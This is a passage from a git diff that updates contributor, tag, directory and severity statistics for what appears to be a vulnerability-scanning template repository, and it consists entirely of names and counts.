reis","count":2},{"name":"mrharshvardhan","count":2},{"name":"myztique","count":2},{"name":"nkxxkn","count":2},{"name":"sy3omda","count":2},{"name":"danielmofer","count":2},{"name":"k11h-de","count":2},{"name":"shelled","count":2},{"name":"c3l3si4n","count":2},{"name":"hetroublemakr","count":2},{"name":"amsda","count":2},{"name":"parzival","count":2},{"name":"kre80r","count":2},{"name":"v0idc0de","count":2},{"name":"streetofhackerr007","count":2},{"name":"nuk3s3c","count":2},{"name":"dheerajmadhukar","count":2},{"name":"amirhossein raeisi","count":2},{"name":"supras","count":2},{"name":"rafaelwdornelas","count":2},{"name":"kiblyn11","count":2},{"name":"uomogrande","count":2},{"name":"sbani","count":2},{"name":"0xsapra","count":2},{"name":"mzack9999","count":2},{"name":"herry","count":2},{"name":"christianpoeschl","count":2},{"name":"luci","count":2},{"name":"github.com/its0x08","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"zy9ard3","count":2},{"name":"koti2","count":2},{"name":"charles d.","count":2},{"name":"bing0o","count":2},{"name":"ree4pwn","count":2},{"name":"udit_thakkur","count":2},{"name":"0xsmiley","count":2},{"name":"supr4s","count":2},{"name":"danmcinerney","count":2},{"name":"t3l3machus","count":2},{"name":"egemenkochisarli","count":2},{"name":"666asd","count":2},{"name":"w4cky_","count":2},{"name":"foulenzer","count":2},{"name":"d4vy","count":2},{"name":"korteke","count":2},{"name":"thabisocn","count":2},{"name":"gal nagli","count":2},{"name":"gevakun","count":2},{"name":"bmcel","count":2},{"name":"ajaysenr","count":2},{"name":"manas_harsh","count":2},{"name":"ehsahil","count":2},{"name":"codexlynx","count":2},{"name":"msegoviag","count":2},{"name":"michal mikolas (nanuqcz)","count":2},{"name":"joshua rogers","count":2},{"name":"redteambrasil","count":2},{"name":"ricardo maia (brainfork)","count":2},{"name":"x1m_martijn","count":2},{"name":"bp0lr","count":2},{"name":"socketz","count":2},{"name":"thardt-praetorian","count":2},{"name":"0xcrypto","count":2},{"name":"nvn1729","count":2},{"name":"0xrudra","count":2},{"name":"serrapa","count":2},{"name":"shankaracharya","count":2},{"name":"8arthur","count":2},{"name":"joeldeleep","count":2},{"name":"thevillagehacker","count":2},{"name":"wa1tf0rme","count":2},{"name":"paradessia","count":2},{"name":"bsysop","count":2},{"name":"martincodes-de","count":2},{"name":"davidegirardi","count":2},{"name":"cristi vlad (@cristivlad25)","count":2},{"name":"bananabr","count":2},{"name":"mohammedsaneem","count":2},{"name":"dogancanbakir","count":2},{"name":"clarkvoss","count":2},{"name":"lstatro","count":2},{"name":"geekby","count":2},{"name":"brucelsone","count":2},{"name":"arliya","count":2},{"name":"n-thumann","count":2},{"name":"usdag","count":2},{"name":"z0ne","count":2},{"name":"0xnirvana","count":2},{"name":"maximus decimus","count":2},{"name":"kishore-hariram","count":2},{"name":"h0j3n","count":2},{"name":"raesene","count":2},{"name":"thezakman","count":2},{"name":"afaq","count":2},{"name":"moritz nentwig","count":2},{"name":"jbaines-r7","count":1},{"name":"retr0","count":1},{"name":"luskabol","count":1},{"name":"shifacyclewla","count":1},{"name":"xeldax","count":1},{"name":"kagamigawa","count":1},{"name":"y0no","count":1},{"name":"null_hypothesis","count":1},{"name":"mr.bobo hp","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"rotembar","count":1},{"name":"8authur","count":1},{"name":"colbyjack1134","count":1},{"name":"tangxiaofeng7","count":1},{"name":"amirmsafari","count":1},{"name":"shelld3v","count":1},{"name":"0xceeb","count":1},{"name":"revblock","count":1},{"name":"rivalsec","count":1},{"name":"sospiro","count":1},{"name":"soyelmago","count":1},{"name":"mihhailsokolov","count":1},{"name":"mesaglio","count":1},{"name":"kr1shna4garwal","count":1},{"name":"d0rkerdevil","count":1},{"name":"fq_hsu","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"andysvints","count":1},{"name":"elmahdi","count":1},{"name":"osamahamad","count":1},{"name":"galoget","count":1},{"name":"opencirt","count":1},{"name":"yiran","count":1},{"name":"sak1","count":1},{"name":"ransomsec","count":1},{"name":"francescocarlucci","count":1},{"name":"fpatrik","count":1},{"name":"geraldino2","count":1},{"name":"elouhi","count":1},{"name":"kaizensecurity","count":1},{"name":"rschio","count":1},{"name":"hardik-rathod","count":1},{"name":"failopen","count":1},{"name":"luqmaan hadia [luqiih](https://github.com/luqiih)","count":1},{"name":"ling","count":1},{"name":"bad5ect0r","count":1},{"name":"zeyad azima","count":1},{"name":"christbowel","count":1},{"name":"drfabiocastro","count":1},{"name":"josecosta","count":1},{"name":"andirrahmani1","count":1},{"name":"miguelsegoviagil","count":1},{"name":"vzamanillo","count":1},{"name":"matthew nickerson (b0than) @ layer 8 security","count":1},{"name":"furkansayim","count":1},{"name":"toufik-airane","count":1},{"name":"mass0ma","count":1},{"name":"amir-h-fallahi","count":1},{"name":"dabla","count":1},{"name":"napgh0st","count":1},{"name":"udinchan","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"team syslifters / christoph mahrl","count":1},{"name":"alevsk","count":1},{"name":"piyushchhiroliya","count":1},{"name":"s1r1u5_","count":1},{"name":"vikas kundu","count":1},{"name":"0xteles","count":1},{"name":"b4uh0lz","count":1},{"name":"exploitation","count":1},{"name":"noamrathaus","count":1},{"name":"arall","count":1},{"name":"mah3sec_","count":1},{"name":"r3nz0","count":1},{"name":"domenicoveneziano","count":1},{"name":"cbadke","count":1},{"name":"chetgan","count":1},{"name":"jfbes","count":1},{"name":"rodnt","count":1},{"name":"archer","count":1},{"name":"axrk","count":1},{"name":"guax1","count":1},{"name":"jaimin gondaliya","count":1},{"name":"arqsz","count":1},{"name":"_c0wb0y_","count":1},{"name":"lethargynavigator","count":1},{"name":"pratik khalane","count":1},{"name":"bjhulst","count":1},{"name":"ap3r","count":1},{"name":"furkansenan","count":1},{"name":"x6263","count":1},{"name":"freakyclown","count":1},{"name":"adilsoybali","count":1},{"name":"duty_1g","count":1},{"name":"absshax","count":1},{"name":"yashanand155","count":1},{"name":"none","count":1},{"name":"omarjezi","count":1},{"name":"booboohq","count":1},{"name":"notsoevilweasel","count":1},{"name":"millermedia","count":1},{"name":"marcos_iaf","count":1},{"name":"aringo-bf","count":1},{"name":"charanrayudu","count":1},{"name":"carrot2","count":1},{"name":"aravind","count":1},{"name":"palanichamy_perumal","count":1},{"name":"af001","count":1},{"name":"willd96","count":1},{"name":"izn0u","count":1},{"name":"petruknisme","count":1},{"name":"hexcat","count":1},{"name":"diablo","count":1},{"name":"mlec","count":1},{"name":"dk999","count":1},{"name":"hczdmr","count":1},{"name":"fur1na","count":1},{"name":"intx0x80","count":1},{"name":"abbas.heybati","count":1},{"name":"irshadahamed","count":1},{"name":"akokonunes","count":1},{"name":"viondexd","count":1},{"name":"kiks7","count":1},{"name":"mukundbhuva","count":1},{"name":"nagli","count":1},{"name":"luqman","count":1},{"name":"bibeksapkota (sar00n)","count":1},{"name":"whotwagner","count":1},{"name":"whynotke","count":1},{"name":"tirtha","count":1},{"name":"jonathanwalker","count":1},{"name":"undefl0w","count":1},{"name":"jas37","count":1},{"name":"compr00t","count":1},{"name":"fmunozs","count":1},{"name":"bugvsme","count":1},{"name":"danigoland","count":1},{"name":"mammad_rahimzada","count":1},{"name":"breno_css","count":1},{"name":"w0tx","count":1},{"name":"0xceba","count":1},{"name":"alperenkesk","count":1},{"name":"kiransau","count":1},{"name":"shiar","count":1},{"name":"unp4ck","count":1},{"name":"w8ay","count":1},{"name":"aayush vishnoi","count":1},{"name":"wlayzz","count":1},{"name":"banana69","count":1},{"name":"caon","count":1},{"name":"noah @thesubtlety","count":1},{"name":"becivells","count":1},{"name":"r3s ost","count":1},{"name":"higor melgaço","count":1},{"name":"xc1ym","count":1},{"name":"esonhugh","count":1},{"name":"sttlr","count":1},{"name":"iphantasmic","count":1},{"name":"brabbit10","count":1},{"name":"petergrifin","count":1},{"name":"therealtoastycat","count":1},{"name":"h4kux","count":1},{"name":"topscoder","count":1},{"name":"jcockhren","count":1},{"name":"lbb","count":1},{"name":"evolutionsec","count":1},{"name":"thebinitghimire","count":1},{"name":"0ut0fb4nd","count":1},{"name":"ramondunker","count":1},{"name":"droberson","count":1},{"name":"1nf1n7y","count":1},{"name":"unknown","count":1},{"name":"infosecsanyam","count":1},{"name":"_harleo","count":1},{"name":"d4ly","count":1},{"name":"hanlaomo","count":1},{"name":"puben","count":1},{"name":"ndmalc","count":1},{"name":"official_blackhat13","count":1},{"name":"act1on3","count":1},{"name":"ringo","count":1},{"name":"deena","count":1},{"name":"wpsec","count":1},{"name":"open-sec","count":1},{"name":"ola456","count":1},{"name":"amanrawat","count":1},{"name":"kailashbohara","count":1},{"name":"lrtk-coder","count":1},{"name":"patralos","count":1},{"name":"igibanez","count":1},{"name":"smaranchand","count":1},{"name":"ahmed sherif","count":1},{"name":"0h1in9e","count":1},{"name":"micha3lb3n","count":1},{"name":"houdinis","count":1},{"name":"erethon","count":1},{"name":"jaskaran","count":1},{"name":"carson chan","count":1},{"name":"higor melgaço (eremit4)","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"akash.c","count":1},{"name":"wabafet","count":1},{"name":"0xtavian","count":1},{"name":"thirukrishnan","count":1},{"name":"dievus","count":1},{"name":"ofjaaah","count":1},{"name":"hakluke","count":1},{"name":"majidmc2","count":1},{"name":"viniciuspereiras","count":1},{"name":"dwbzn","count":1},{"name":"tea","count":1},{"name":"hateshape","count":1},{"name":"0xelkomy \u0026 c0nqr0r","count":1},{"name":"sorrowx3","count":1},{"name":"arr0way","count":1},{"name":"aron molnar","count":1},{"name":"retr02332","count":1},{"name":"qianbenhyu","count":1},{"name":"harshinsecurity","count":1},{"name":"apt-mirror","count":1},{"name":"matt miller","count":1},{"name":"floriandewald","count":1},{"name":"akshansh","count":1},{"name":"0xrod","count":1},{"name":"hotpot","count":1},{"name":"skylark-lab","count":1},{"name":"hazana","count":1},{"name":"aresx","count":1},{"name":"myst7ic","count":1},{"name":"ooooooo_q","count":1},{"name":"bywalks","count":1},{"name":"aaronchen0","count":1},{"name":"mchklt","count":1},{"name":"0xparth","count":1},{"name":"ayadi","count":1},{"name":"rumble773","count":1},{"name":"shockwave","count":1},{"name":"zhenwarx","count":1},{"name":"babybash","count":1},{"name":"jteles","count":1},{"name":"sdcampbell","count":1},{"name":"k3rwin","count":1},{"name":"mabdullah22","count":1},{"name":"arjunchandarana","count":1},{"name":"luqmaan hadia","count":1},{"name":"paper-pen","count":1},{"name":"hlop","count":1},{"name":"qlkwej","count":1},{"name":"savik","count":1},{"name":"ky9oss","count":1},{"name":"djoevanka","count":1},{"name":"rotemreiss","count":1},{"name":"flag007","count":1},{"name":"tirtha_mandal","count":1},{"name":"hyunsoo-ds","count":1},{"name":"jeya seelan","count":1},{"name":"lady_bug","count":1},{"name":"lark lab","count":1},{"name":"natto97","count":1},{"name":"jrolf","count":1},{"name":"alex","count":1},{"name":"miryangjung","count":1},{"name":"davidfegyver","count":1},{"name":"mayankpandey01","count":1},{"name":"luciannitescu","count":1},{"name":"sshell","count":1},{"name":"west-wise","count":1},{"name":"sinsinology","count":1},{"name":"sherlocksecurity","count":1},{"name":"shivanshkhari","count":1},{"name":"sickwell","count":1},{"name":"oscarintherocks","count":1},{"name":"bartu utku sarp","count":1},{"name":"juicypotato1","count":1},{"name":"p-l-","count":1},{"name":"yusakie","count":1},{"name":"elder tao","count":1},{"name":"imhunterand","count":1},{"name":"stupidfish","count":1},{"name":"dali","count":1},{"name":"screamy","count":1},{"name":"denandz","count":1},{"name":"phillipo","count":1},{"name":"nytr0gen","count":1},{"name":"unkl4b","count":1},{"name":"evan rubinstien","count":1},{"name":"daffianfo","count":1},{"name":"mubassirpatel","count":1},{"name":"s1r1us","count":1},{"name":"queencitycyber","count":1},{"name":"f1she3","count":1},{"name":"twitter.com/dheerajmadhukar","count":1},{"name":"kurohost","count":1},{"name":"aaban solutions","count":1},{"name":"olewagner","count":1},{"name":"regala_","count":1},{"name":"exid","count":1},{"name":"blckraven","count":1},{"name":"nielsing","count":1},{"name":"lingtren","count":1},{"name":"mordavid","count":1},{"name":"0xd0ff9","count":1},{"name":"xstp","count":1},{"name":"orpheus","count":1},{"name":"carlosvieira","count":1},{"name":"gpiechnik2","count":1},{"name":"pphuahua","count":1},{"name":"jc175","count":1},{"name":"momen eldawakhly","count":1},{"name":"pwnwithlove","count":1},{"name":"nobody","count":1},{"name":"elitebaz","count":1},{"name":"5up3r541y4n","count":1},{"name":"yuansec","count":1},{"name":"michal-mikolas","count":1},{"name":"ilovebinbash","count":1},{"name":"schniggie","count":1},{"name":"pjborah","count":1},{"name":"sanineng","count":1},{"name":"husain","count":1},{"name":"kresec","count":1},{"name":"ahmed abou-ela","count":1},{"name":"dorkerdevil","count":1},{"name":"berkdusunur","count":1},{"name":"zinminphy0","count":1},{"name":"push4d","count":1},{"name":"0xkayala","count":1},{"name":"miroslavsotak","count":1},{"name":"amnotacat","count":1},{"name":"william söderberg @ withsecure","count":1},{"name":"2rs3c","count":1},{"name":"tehtbl","count":1},{"name":"brianlam38","count":1},{"name":"barthy.koeln","count":1},{"name":"couskito","count":1},{"name":"dawid-czarnecki","count":1},{"name":"tim_koopmans","count":1},{"name":"yaser_s","count":1},{"name":"m0ck3d","count":1},{"name":"adrianmf","count":1},{"name":"eremit4","count":1},{"name":"j33n1k4","count":1},{"name":"pdp","count":1},{"name":"mhdsamx","count":1},{"name":"jeya.seelan","count":1},{"name":"kchason","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"liquidsec","count":1},{"name":"sicksec","count":1},{"name":"spac3wh1te","count":1},{"name":"fopina","count":1},{"name":"high","count":1},{"name":"anonymous","count":1},{"name":"daviey","count":1},{"name":"rubina119","count":1},{"name":"pussycat0","count":1},{"name":"shivampand3y","count":1},{"name":"naglis","count":1},{"name":"xcapri","count":1},{"name":"godfatherorwa","count":1},{"name":"bernardo rodrigues @bernardofsr","count":1},{"name":"lixts","count":1},{"name":"professorabhay","count":1},{"name":"danfaizer","count":1},{"name":"chesterblue","count":1},{"name":"makyotox","count":1},{"name":"adamparsons","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"harryha","count":1},{"name":"borna nematzadeh","count":1},{"name":"0xcharan","count":1},{"name":"vulnspace","count":1},{"name":"ynnirc","count":1},{"name":"anon-artist","count":1},{"name":"dmartyn","count":1},{"name":"sec_hawk","count":1},{"name":"bjxsec","count":1},{"name":"unblvr1","count":1},{"name":"technicaljunkie","count":1},{"name":"numan türle","count":1},{"name":"am0nt31r0","count":1},{"name":"dhiyanesdk","count":1},{"name":"mbmy","count":1},{"name":"michael wedl","count":1},{"name":"yashgoti","count":1},{"name":"gonski","count":1},{"name":"prettyboyaaditya","count":1},{"name":"remi gascou (podalirius)","count":1},{"name":"iampritam","count":1},{"name":"calumjelrick","count":1},{"name":"0xprial","count":1},{"name":"cravaterouge","count":1},{"name":"b0yd","count":1},{"name":"marcio mendes","count":1},{"name":"gboddin","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"mayank_pandey01","count":1},{"name":"youngpope","count":1},{"name":"watchtowr","count":1},{"name":"co0nan","count":1},{"name":"0xh7ml","count":1},{"name":"samuelsamuelsamuel","count":1},{"name":"alexrydzak","count":1},{"name":"mrcl0wnlab","count":1},{"name":"shreyapohekar","count":1},{"name":"thelicato","count":1},{"name":"ptonewreckin","count":1},{"name":"jub0bs","count":1},{"name":"ohlinge","count":1},{"name":"notwhy","count":1},{"name":"ruppde","count":1},{"name":"h4sh5","count":1},{"name":"erikowen","count":1},{"name":"exceed","count":1},{"name":"adnanekhan","count":1},{"name":"zandros0","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"zsusac","count":1},{"name":"vinit989","count":1},{"name":"ledoubletake","count":1},{"name":"secthebit","count":1},{"name":"juliosmelo","count":1},{"name":"clment cruchet","count":1},{"name":"narluin","count":1},{"name":"ipanda","count":1},{"name":"omranisecurity","count":1},{"name":"mantissts","count":1},{"name":"yavolo","count":1},{"name":"rojanrijal","count":1},{"name":"ldionmarcil","count":1},{"name":"philippdelteil","count":1},{"name":"pry0cc","count":1},{"name":"joaonevess","count":1},{"name":"b0rn2r00t","count":1},{"name":"realexp3rt","count":1},{"name":"mohammad reza omrani | @omranisecurity","count":1},{"name":"pudsec","count":1},{"name":"httpvoid","count":1},{"name":"ok_bye_now","count":1},{"name":"ahmetpergamum","count":1},{"name":"manuelbua","count":1},{"name":"bughuntersurya","count":1},{"name":"justmumu","count":1},{"name":"knassar702","count":1},{"name":"xshuden","count":1},{"name":"th3.d1p4k","count":1},{"name":"metascan","count":1},{"name":"nerrorsec","count":1},{"name":"phyr3wall","count":1},{"name":"f0xy","count":1},{"name":"win3zz","count":1},{"name":"kabirsuda","count":1},{"name":"remonsec","count":1},{"name":"dale clarke","count":1},{"name":"rinolock","count":1},{"name":"udyz","count":1},{"name":"jbertman","count":1},{"name":"allenwest24","count":1},{"name":"affix","count":1},{"name":"pepitoh","count":1},{"name":"manasmbellani","count":1},{"name":"invisiblethreat","count":1},{"name":"omarkurt","count":1},{"name":"chron0x","count":1},{"name":"_darrenmartyn","count":1},{"name":"kareemse1im","count":1},{"name":"un-fmunozs","count":1},{"name":"mariam tariq","count":1},{"name":"jacalynli","count":1},{"name":"byobin","count":1},{"name":"jna1","count":1},{"name":"hakimkt","count":1},{"name":"ph33rr","count":1},{"name":"jiheon-dev","count":1},{"name":"nuts7","count":1},{"name":"shiva (strobes security)","count":1},{"name":"noobexploiter","count":1},{"name":"patrick pirker","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"th3r4id","count":1},{"name":"zn9988","count":1},{"name":"pascalheidmann","count":1},{"name":"lamscun","count":1},{"name":"ramkrishna sawant","count":1}],"directory":[{"name":"http","count":7477},{"name":"file","count":337},{"name":"workflows","count":191},{"name":"network","count":135},{"name":"cloud","count":98},{"name":"code","count":81},{"name":"javascript","count":57},{"name":"ssl","count":29},{"name":"dns","count":22},{"name":"dast","count":21},{"name":"headless","count":11},{"name":"cves.json","count":1},{"name":"contributors.json","count":1},{"name":"TEMPLATES-STATS.json","count":1}],"severity":[{"name":"info","count":3683},{"name":"high","count":1728},{"name":"medium","count":1520},{"name":"critical","count":1035},{"name":"low","count":263},{"name":"unknown","count":39}],"types":[{"name":"file","count":337},{"name":"dns","count":25}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index 6ddbad3911..2224519a71 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,5384 +1,5410 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-------------------------------------------------------|-------|---------------------------------------|-------|----------------------|-------|----------|-------|------|-------| -| cve | 2474 | dhiyaneshdk | 1277 | http | 7417 | info | 3657 | file | 337 | -| panel | 1133 | daffainfo | 864 | file | 337 | high | 1703 | dns | 25 | -| wordpress | 973 | dwisiswant0 | 803 | workflows | 191 | medium | 1517 | | | -| exposure | 908 | pikpikcu | 353 | network | 138 | critical | 1029 | | | -| xss | 904 | pussycat0x | 353 | cloud | 98 | low | 265 | | | -| wp-plugin | 844 | ritikchaddha | 336 | code | 81 | unknown | 39 | | | -| osint | 804 | pdteam | 297 | javascript | 56 | | | | | -| tech | 674 | princechaddha | 268 | ssl | 29 | | | | | -| lfi | 654 | ricardomaia | 232 | dns | 22 | | | | | -| misconfig | 606 | geeknik | 230 | dast | 21 | | | | | +| cve | 2490 | dhiyaneshdk | 1289 | http | 7477 | info | 3683 | file | 337 | +| panel | 1145 | daffainfo | 864 | file | 337 | high | 1728 | dns | 25 | +| wordpress | 976 | dwisiswant0 | 803 | workflows | 191 | medium | 1520 | | | +| exposure | 916 | pussycat0x | 354 | network | 135 | critical | 1035 | | | +| xss | 906 | pikpikcu | 353 | cloud | 98 | low | 263 | | | +| wp-plugin | 847 | ritikchaddha | 346 | code | 81 | unknown | 39 | | | +| osint | 804 | pdteam | 297 | javascript | 57 | | | | | +| tech | 682 | princechaddha | 269 | ssl | 29 | | | | | +| lfi | 658 | ricardomaia | 232 | dns | 22 | | | | | +| misconfig | 620 | geeknik | 231 | dast | 21 | | | | | | edb | 599 | theamanrawat | 223 | headless | 11 | | | | | -| rce | 591 | r3y3r53 | 200 | contributors.json | 1 | | | | | +| rce | 594 | r3y3r53 | 200 | contributors.json | 1 | | | | | | packetstorm | 530 | 0x_akoko | 179 | TEMPLATES-STATS.json | 1 | | | | | -| wpscan | 495 | gy741 | 158 | cves.json | 1 | | | | | -| cve2021 | 491 | rxerium | 141 | | | | | | | -| cve2022 | 476 | sleepingbag945 | 132 | | | | | | | -| wp | 419 | righettod | 131 | | | | | | | -| cve2023 | 364 | arafatansari | 118 | | | | | | | -| unauth | 363 | tess | 109 | | | | | | | -| sqli | 352 | pdresearch | 81 | | | | | | | -| file | 346 | iamnoooob | 68 | | | | | | | -| authenticated | 342 | madrobot | 65 | | | | | | | -| intrusive | 299 | idealphase | 65 | | | | | | | -| kev | 268 | zzeitlin | 64 | | | | | | | -| login | 259 | rootxharsh | 61 | | | | | | | -| detect | 259 | akincibor | 59 | | | | | | | +| wpscan | 497 | gy741 | 158 | cves.json | 1 | | | | | +| cve2021 | 491 | rxerium | 142 | | | | | | | +| cve2022 | 476 | righettod | 141 | | | | | | | +| wp | 421 | sleepingbag945 | 132 | | | | | | | +| cve2023 | 374 | arafatansari | 118 | | | | | | | +| unauth | 366 | tess | 109 | | | | | | | +| sqli | 357 | pdresearch | 82 | | | | | | | +| file | 346 | iamnoooob | 69 | | | | | | | +| authenticated | 341 | idealphase | 66 | | | | | | | +| intrusive | 300 | madrobot | 65 | | | | | | | +| detect | 283 | zzeitlin | 64 | | | | | | | +| login | 276 | rootxharsh | 62 | | | | | | | +| kev | 268 | akincibor | 59 | | | | | | | | cve2020 | 257 | for3stco1d | 55 | | | | | | | | token-spray | 243 | philippedelteil | 53 | | | | | | | -| oast | 221 | edoardottt | 42 | | | | | | | -| config | 220 | gaurang | 42 | | | | | | | -| top-200 | 215 | johnk3r | 40 | | | | | | | -| default-login | 211 | j4vaovo | 35 | | | | | | | -| osint-social | 210 | c-sh0 | 35 | | | | | | | -| network | 194 | adam crosser | 31 | | | | | | | -| token | 193 | luisfelipe146 | 31 | | | | | | | -| | 191 | mastercho | 29 | | | | | | | -| apache | 188 | ice3man | 29 | | | | | | | +| oast | 222 | gaurang | 42 | | | | | | | +| config | 221 | edoardottt | 42 | | | | | | | +| top-200 | 215 | johnk3r | 41 | | | | | | | +| default-login | 212 | c-sh0 | 35 | | | | | | | +| osint-social | 210 | j4vaovo | 35 | | | | | | | +| token | 193 | adam crosser | 31 | | | | | | | +| | 192 | luisfelipe146 | 31 | | | | | | | +| network | 192 | mastercho | 29 | | | | | | | +| apache | 189 | ice3man | 29 | | | | | | | | devops | 176 | pwnhxl | 28 | | | | | | | -| cve2018 | 169 | hardik-solanki | 24 | | | | | | | -| iot | 166 | organiccrap | 24 | | | | | | | +| cve2018 | 169 | organiccrap | 24 | | | | | | | +| iot | 166 | hardik-solanki | 24 | | | | | | | | cve2019 | 165 | techbrunchfr | 23 | | | | | | | -| keys | 155 | ctflearner | 23 | | | | | | | -| joomla | 148 | harsh | 23 | | | | | | | +| keys | 155 | harsh | 23 | | | | | | | +| joomla | 148 | ctflearner | 23 | | | | | | | | malware | 142 | ffffffff0x | 22 | | | | | | | | redirect | 135 | parthmalhotra | 20 | | | | | | | -| aws | 133 | sullo | 18 | | | | | | | -| cloud | 132 | cckuailong | 18 | | | | | | | -| auth-bypass | 129 | 0xpugazh | 16 | | | | | | | -| ssrf | 119 | shaikhyaser | 16 | | | | | | | -| phishing | 117 | random-robbie | 16 | | | | | | | +| aws | 133 | cckuailong | 18 | | | | | | | +| cloud | 132 | kazgangap | 18 | | | | | | | +| auth-bypass | 131 | sullo | 18 | | | | | | | +| ssrf | 119 | bhutch | 17 | | | | | | | +| install | 118 | 0xpugazh | 16 | | | | | | | +| phishing | 117 | shaikhyaser | 16 | | | | | | | | amazon | 116 | lu4nx | 16 | | | | | | | -| files | 113 | sheikhrishad | 15 | | | | | | | -| cve2010 | 112 | unapibageek | 15 | | | | | | | -| cms | 110 | bhutch | 15 | | | | | | | -| cve2017 | 110 | pr3r00t | 15 | | | | | | | -| router | 108 | milo2012 | 14 | | | | | | | -| install | 107 | kazgangap | 14 | | | | | | | -| top-100 | 100 | dogasantos | 14 | | | | | | | -| disclosure | 89 | r3dg33k | 14 | | | | | | | -| aws-cloud-config | 89 | tenbird | 14 | | | | | | | -| linux | 83 | melbadry9 | 13 | | | | | | | -| code | 81 | 0ri2n | 13 | | | | | | | +| files | 113 | random-robbie | 16 | | | | | | | +| cve2010 | 112 | sheikhrishad | 15 | | | | | | | +| cms | 112 | pr3r00t | 15 | | | | | | | +| cve2017 | 110 | unapibageek | 15 | | | | | | | +| router | 108 | r3dg33k | 14 | | | | | | | +| top-100 | 100 | milo2012 | 14 | | | | | | | +| disclosure | 89 | tenbird | 14 | | | | | | | +| aws-cloud-config | 89 | dogasantos | 14 | | | | | | | +| linux | 83 | userdehghani | 14 | | | | | | | +| code | 81 | nullfuzz | 13 | | | | | | | | local | 80 | theabhinavgaur | 13 | | | | | | | -| takeover | 79 | sharath | 13 | | | | | | | -| seclists | 79 | nullfuzz | 13 | | | | | | | -| privesc | 79 | elsfa7110 | 13 | | | | | | | -| tokens | 78 | suman_kar | 12 | | | | | | | -| fileupload | 76 | kazet | 12 | | | | | | | -| oracle | 70 | meme-lord | 12 | | | | | | | +| privesc | 79 | sharath | 13 | | | | | | | +| seclists | 79 | melbadry9 | 13 | | | | | | | +| takeover | 79 | 0ri2n | 13 | | | | | | | +| tokens | 78 | elsfa7110 | 13 | | | | | | | +| fileupload | 76 | meme-lord | 12 | | | | | | | +| oracle | 71 | suman_kar | 12 | | | | | | | +| cve2024 | 69 | kazet | 12 | | | | | | | | oss | 67 | cyllective | 11 | | | | | | | | cisco | 66 | wdahlenb | 11 | | | | | | | -| cve2024 | 63 | 0x240x23elu | 10 | | | | | | | -| js | 62 | nadino | 10 | | | | | | | -| adobe | 62 | alph4byt3 | 10 | | | | | | | -| ir | 61 | random_robbie | 10 | | | | | | | -| cve2015 | 59 | co5mos | 10 | | | | | | | +| js | 63 | alph4byt3 | 10 | | | | | | | +| adobe | 62 | nadino | 10 | | | | | | | +| ir | 61 | 0x240x23elu | 10 | | | | | | | | huntr | 59 | hackergautam | 10 | | | | | | | +| cve2015 | 59 | random_robbie | 10 | | | | | | | | atlassian | 57 | logicalhunter | 10 | | | | | | | -| cve2016 | 57 | fabaff | 9 | | | | | | | -| google | 56 | adamcrosser | 9 | | | | | | | -| vmware | 56 | initstring | 9 | | | | | | | -| enum | 55 | oppsec | 9 | | | | | | | -| c2 | 55 | emadshanab | 9 | | | | | | | -| logs | 48 | olearycrew | 9 | | | | | | | -| tenable | 48 | momika233 | 9 | | | | | | | -| log4j | 47 | _0xf4n9x_ | 8 | | | | | | | -| hackerone | 46 | iamthefrogy | 8 | | | | | | | -| vulhub | 46 | veshraj | 8 | | | | | | | -| aem | 45 | aashiq | 8 | | | | | | | -| osint-gaming | 45 | irshad ahamed | 8 | | | | | | | -| jndi | 44 | that_juan_ | 8 | | | | | | | -| cve2014 | 44 | noraj | 8 | | | | | | | -| php | 44 | zh | 8 | | | | | | | -| debug | 44 | huta0 | 7 | | | | | | | -| deserialization | 43 | tarunkoyalwar | 7 | | | | | | | -| plugin | 42 | amit-jd | 7 | | | | | | | -| generic | 42 | caspergn | 7 | | | | | | | -| traversal | 42 | me_dheeraj | 7 | | | | | | | +| cve2016 | 57 | co5mos | 10 | | | | | | | +| enum | 56 | initstring | 9 | | | | | | | +| google | 56 | emadshanab | 9 | | | | | | | +| vmware | 56 | olearycrew | 9 | | | | | | | +| c2 | 55 | momika233 | 9 | | | | | | | +| logs | 48 | adamcrosser | 9 | | | | | | | +| tenable | 48 | oppsec | 9 | | | | | | | +| log4j | 47 | fabaff | 9 | | | | | | | +| hackerone | 46 | that_juan_ | 8 | | | | | | | +| vulhub | 46 | aashiq | 8 | | | | | | | +| aem | 45 | noraj | 8 | | | | | | | +| osint-gaming | 45 | _0xf4n9x_ | 8 | | | | | | | +| php | 44 | veshraj | 8 | | | | | | | +| jndi | 44 | zh | 8 | | | | | | | +| cve2014 | 44 | irshad ahamed | 8 | | | | | | | +| debug | 44 | iamthefrogy | 8 | | | | | | | +| deserialization | 43 | divya_mudgal | 7 | | | | | | | +| osint-porn | 42 | leovalcante | 7 | | | | | | | +| traversal | 42 | nodauf | 7 | | | | | | | +| oa | 42 | caspergn | 7 | | | | | | | +| generic | 42 | me_dheeraj | 7 | | | | | | | | | | (https://twitter.com/dheerajmadhukar) | | | | | | | | -| osint-porn | 42 | its0x08 | 7 | | | | | | | -| osint-hobby | 42 | kophjager007 | 7 | | | | | | | -| oa | 42 | techryptic (@tech) | 7 | | | | | | | -| springboot | 41 | randomstr1ng | 7 | | | | | | | -| misc | 39 | dr_set | 7 | | | | | | | -| cnvd | 39 | harshbothra_ | 7 | | | | | | | -| microsoft | 38 | divya_mudgal | 7 | | | | | | | -| injection | 38 | leovalcante | 7 | | | | | | | -| jira | 37 | nodauf | 7 | | | | | | | -| listing | 37 | gitlab red team | 6 | | | | | | | -| kubernetes | 37 | __fazal | 6 | | | | | | | -| cti | 36 | clem9669 | 6 | | | | | | | +| plugin | 42 | amit-jd | 7 | | | | | | | +| osint-hobby | 42 | huta0 | 7 | | | | | | | +| springboot | 41 | kophjager007 | 7 | | | | | | | +| cnvd | 40 | its0x08 | 7 | | | | | | | +| misc | 39 | techryptic (@tech) | 7 | | | | | | | 